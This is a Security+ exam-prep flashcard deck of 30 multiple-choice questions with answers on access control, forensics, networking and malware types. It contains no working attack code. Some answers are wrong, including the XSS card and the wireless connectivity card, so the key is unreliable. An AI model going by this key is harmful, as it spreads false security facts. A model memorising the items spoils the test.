Topic 5 Flashcards Preview

Sec+ > Topic 5 > Flashcards

Flashcards in Topic 5 Deck (351)
Loading flashcards...
1

A company wants to ensure confidential data from storage media is sanitized in such a way that the drive
cannot be reused. Which of the following method should the technician use?

Shredding
Wiping
Low-level formatting
Repartitioning
Overwriting

Shredding

2

An organization's employees currently use three different sets of credentials to access multiple internal
resources. Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal?

Transitive trust
Single sign-on
Federation
Secure token

Single Sign on

3

Students at a residence hall are reporting Internet connectivity issues. The university’s network administrator configured the residence hall’s network to provide public IP addresses to all connected devices, but many student devices are receiving private IP addresses due to rogue devices. The network administrator verifies the residence hall’s network is correctly configured and contacts the security administrator for help. Which of the following configurations should the security administrator suggest for implementation?

Router ACLs
BPDU guard
Flood guard
DHCP snooping

DHCP snooping

4

Which of the following is a major difference between XSS attacks and remote code exploits?

XSS attacks use machine language, while remote exploits use interpreted language

XSS attacks target servers, while remote code exploits target clients

Remote code exploits aim to escalate attackers’ privileges, while XSS attacks aim to gain access only

Remote code exploits allow writing code at the client side and executing it, while XSS attacks require
no code to work

XSS attacks use machine language, while remote exploits use interpreted language

5

An attachment that was emailed to finance employees contained an embedded message. The security
administrator investigates and finds the intent was to conceal the embedded information from public view.
Which of the following BEST describes this type of message?

Obfuscation
Stenography
Diffusion
BCRYPT

Obfuscation

6

Which of the following locations contain the MOST volatile data?

SSD
Paging file
RAM
Cache memory

Cache memory

7

An incident response analyst at a large corporation is reviewing proxy data log. The analyst believes a
malware infection may have occurred. Upon further review, the analyst determines the computer responsible for the suspicious network traffic is used by the Chief Executive Officer (CEO).

Which of the following is the best NEXT step for the analyst to take?

Call the CEO directly to ensure awareness of the event
Run a malware scan on the CEO’s workstation
Reimage the CEO’s workstation
Disconnect the CEO’s workstation from the network

Disconnect the CEO's workstation from the network

8

Which of the following is a random value appended to a credential that makes the credential less susceptible to compromise when hashed?

Nonce
Salt
OTP
Block cipher
IV

Salt

9

A systems administrator found a suspicious file in the root of the file system. The file contains URLs,
usernames, passwords, and text from other documents being edited on the system. Which of the following
types of malware would generate such a file?

Keylogger
Rootkit
Bot
RAT

Keylogger

10

A company utilizes 802.11 for all client connectivity within a facility. Users in one part of the building are
reporting they are unable to access company resources when connected to the company SSID.
Which of the following should the security administrator use to assess connectivity?

Sniffer
Honeypot
Routing tables
Wireless scanner

Routing tables

11

An analyst generates the following color-coded table shown in the exhibit to help explain the risk of potential
incidents in the company. The vertical axis indicates the likelihood or an incident, while the horizontal axis
indicates the impact.

Which of the following is this table an example of?

Internal threat assessment
Privacy impact assessment
Qualitative risk assessment
Supply chain assessment

Qualitative risk assessment

12

Legal authorities notify a company that its network has been compromised for the second time in two years.
The investigation shows the attackers were able to use the same vulnerability on different systems in both
attacks. Which of the following would have allowed the security team to use historical information to protect
against the second attack?

Key risk indicators
Lessons learned
Recovery point objectives
Tabletop exercise

Lessons learned

13

An organization identifies a number of hosts making outbound connections to a known malicious IP over port TCP 80. The organization wants to identify the data being transmitted and prevent future connections to this IP. Which of the following should the organization do to achieve this outcome?

Use a protocol analyzer to reconstruct the data and implement a web-proxy.
Deploy a web-proxy and then blacklist the IP on the firewall.
Deploy a web-proxy and implement IPS at the network edge.
Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.

Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.

14

A security technician has been given the task of preserving emails that are potentially involved in a dispute between a company and a contractor.
Which of the following BEST describes this forensic concept?

Legal hold
Chain of custody
Order of volatility
Data acquisition

Legal hold

15

A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is a
requirement for this configuration?

Setting up a TACACS+ server
Configuring federation between authentication servers
Enabling TOTP
Deploying certificates to endpoint devices

Deploying certificates to endpoint devices

16

Which of the following uses tokens between the identity provider and the service provider to authenticate and authorize users to resources?

RADIUS
SSH
OAuth
MSCHAP

OAuth

17

Which of the following is an example of resource exhaustion?

A penetration tester requests every available IP address from a DHCP server.
An SQL injection attack returns confidential data back to the browser.
Server CPU utilization peaks at 100% during the reboot process.
System requirements for a new software package recommend having 12GB of RAM, but only BGB are available.

A penetration tester requests every available IP address from a DHCP server

18

A company recently updated its website to increase sales. The new website uses PHP forms for leads and
provides a directory with sales staff and their phone numbers. A systems administrator is concerned with the new website and provides the following log to support the concern:

Which of the following is the systems administrator MOST likely to suggest to the Chief Information Security Officer (CISO) based on the above?

Changing the account standard naming convention
Implementing account lockouts
Discontinuing the use of privileged accounts
Increasing the minimum password length from eight to ten characters

Changing the account standard naming convention

19

An organization’s Chief Executive Officer (CEO) directs a newly hired computer technician to install an OS
on the CEO’s personal laptop. The technician performs the installation, and a software audit later in the month indicates a violation of the EULA occurred as a result.

Which of the following would address this violation
going forward?

Security configuration baseline
Separation of duties
AUP
NDA

AUP (acceptable use policy)

20

A security administrator is implementing a secure method that allows developers to place files or objects onto a Linux Server. Developers are required to log in using a username, password, and asymmetirc key. Which of the following protocols should be implemented?

ssl/tls
sftp
srtp
ipsec

SFTP

21

A network technician is designing a network for a small company. The network technician needs to implement
an email server and web server that will be accessed by both internal employees and external customers.
Which of the following would BEST secure the internal network and allow access to the needed servers?

Implementing a site-to-site VPN for server access.
Implementing a DMZ segment for the server.
Implementing NAT addressing for the servers.
Implementing a sandbox to contain the servers.

Implementing a DMZ segment for the server

22

A Chief Information Officer (CIO) asks the company's security specialist if the company should spend any
funds on malware protection for a specific server. Based on a risk assessment, the ARO value of a malware infection for a server is 5 and the annual cost for the malware protection is $2500. Which of the following SLE values warrants a recommendation against purchasing the malware protection?

$500
$1000
$2000
$2500

$500

23

A security auditor is reviewing the following output from file integrity monitoring software installed on a very busy server at a large service provider. The server has not been updates since it was installed. Drag and drop the log entry that identifies the first instance of server compromise.

Page 229

1/1/2017 3:30:00

24

Which of the following control types would a backup of server data provide in case of a system issue?

Corrective
Deterrent
Preventive
Detective

Corrective

25

A penetration testing team deploys a specifically crafted payload to a web server, which results in opening a new session as the web server daemon. This session has full read/write access to the file system and the admin console. Which of the following BEST describes the attack?

Domain hijacking
Injection
Buffer overflow
Privilege escalation

Privilege escalation

26

A security administrator suspects that a DDoS attack is affecting the DNS server. The administrator accesses a
workstation with the hostname of workstation01 on the network and obtains the following output from the
ipconfig command:

The administrator successfully pings the DNS server from the workstation. Which of the following commands
should be issued from the workstation to verify the DDoS attack is no longer occurring?

dig www.google.com
dig 192.168.1.254
dig workstation01.com
dig 192.168.1.26

dig workstation01.com

27

After reports of slow internet connectivity, a technician reviews the following logs from a server’s host-based
firewall:

Which of the following can the technician conclude after reviewing the above logs?

The server is under a DDoS attack from multiple geographic locations.

The server is compromised, and is attacking multiple hosts on the Internet.

The server is under an IP spoofing resource exhaustion attack.

The server is unable to complete the TCP three-way handshake and send the last ACK.

The server is under an IP spoofing resource exhaustion attack.

28

A company wants to implement an access management solution that allows employees to use the same usernames and passwords for multiple applications without having to keep multiple credentials synchronized.

Which of the following solutions would BEST meet these requirements?

Multifactor authentication
SSO
Biometrics
PKI
Federation

SSO

29

An audit reported has identifies a weakness that could allow unauthorized personnel access to the facility at its main entrance and from there gain access to the network. Which of the following would BEST resolve the vulnerability?

Faraday cage
Air gap
Mantrap
Bollards

Mantrap

30

A security analyst believes an employee’s workstation has been compromised. The analyst reviews the system
logs, but does not find any attempted logins. The analyst then runs the diff command, comparing the
C:\Windows\System32 directory and the installed cache directory. The analyst finds a series of files that look
suspicious.
One of the files contains the following commands:
Which of the following types of malware was used?

Worm
Spyware
Logic bomb
Backdoor

Backdoor